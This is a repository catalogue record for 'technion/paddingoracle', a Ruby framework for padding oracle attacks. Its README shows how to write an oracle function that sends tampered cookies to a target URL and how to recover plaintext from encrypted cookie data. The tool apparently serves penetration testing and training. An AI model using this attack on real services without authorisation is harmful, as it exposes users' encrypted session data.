{"id":21548516,"url":"https://github.com/technion/paddingoracle","last_synced_at":"2025-07-17T15:37:32.354Z","repository":{"id":56887219,"uuid":"87386508","full_name":"technion/paddingoracle","owner":"technion","description":"Ruby framework for exploiting padding oracle vulnerabilities","archived":false,"fork":false,"pushed_at":"2017-07-11T11:01:14.000Z","size":9,"stargazers_count":6,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-06-13T15:51:06.123Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/technion.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-04-06T04:34:03.000Z","updated_at":"2024-07-05T04:42:14.000Z","dependencies_parsed_at":"2022-08-21T00:50:46.144Z","dependency_job_id":null,"html_url":"https://github.com/technion/paddingoracle","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/technion/paddingoracle","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/technion%2Fpaddingoracle","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/technion%2Fpaddingoracle/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/technion%2Fpaddingoracle/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/technion%2Fpaddingoracle/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/technion","download_url":"https://codeload.github.com/technion/paddingoracle/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/technion%2Fpaddingoracle/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265623368,"owners_count":23800150,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-24T06:18:53.834Z","updated_at":"2025-07-17T15:37:32.336Z","avatar_url":"https://github.com/technion.png","language":"Ruby","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Paddingoracle\n\nThis is a Rubyframework for exploiting padding oracle vulnerabilities based on this fantastic Python project:\n\nhttps://github.com/mwielgoszewski/python-paddingoracle\n\n## Build status\n[![Build Status](https://travis-ci.org/technion/paddingoracle.svg?branch=master)](https://travis-ci.org/technion/paddingoracle)\n\n## Usage\n\n\nYou will first need to extend the module with your own padding_oracle function. Example:\n\n```\nrequire 'httparty'\nrequire 'base64'\nrequire 'uri'\n\nURL = 'http://google.com'\nmodule Paddingoracle\n  def decrypt_oracle(string)\n    string = URI.escape(Base64.strict_encode64(string))\n    response = HTTParty.get(URL, cookies: {auth: string})\n\n    raise \"Invalid padding\" if response.code != 200\n  end\nend\n```\n\nYou can then run the attack like this;\n```\nBlocksize = 8\nCOOKIE = 'vulnerable encrypted data'\nbcookie = Base64.decode64(COOKIE)\nplain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)\nputs plain\n```\n\n## Contributing\n\nThis product was written to solve a specific problem - I'm happy to investigate bugs but this type of codebase is not suited to new features or \"how to use\" requests.\n\nIf you are interested in this tool, we highly recommend the training at [PentesterLab](pentesterlab.com), which includes a vulnerable service relevant to this tool.\n\n## License\n\nThe gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftechnion%2Fpaddingoracle","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftechnion%2Fpaddingoracle","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftechnion%2Fpaddingoracle/lists"}